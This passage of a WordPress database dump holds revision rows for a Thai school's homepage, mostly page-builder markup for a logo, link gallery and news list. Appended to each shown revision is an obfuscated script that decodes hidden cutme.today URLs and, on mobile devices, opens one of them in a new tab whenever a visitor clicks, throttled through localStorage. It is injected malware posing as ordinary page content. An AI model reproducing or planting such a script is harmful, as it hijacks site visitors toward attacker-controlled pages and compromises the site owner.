_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:41:24','2024-07-27 03:41:24','',14,'http://pakhaeng.ssk.in.th/?p=41',0,'revision','',0),
(43,1,'2024-07-27 10:44:30','2024-07-27 03:44:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:44:30','2024-07-27 03:44:30','',14,'http://pakhaeng.ssk.in.th/?p=43',0,'revision','',0),
(44,1,'2024-07-27 10:44:52','2024-07-27 03:44:52','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" 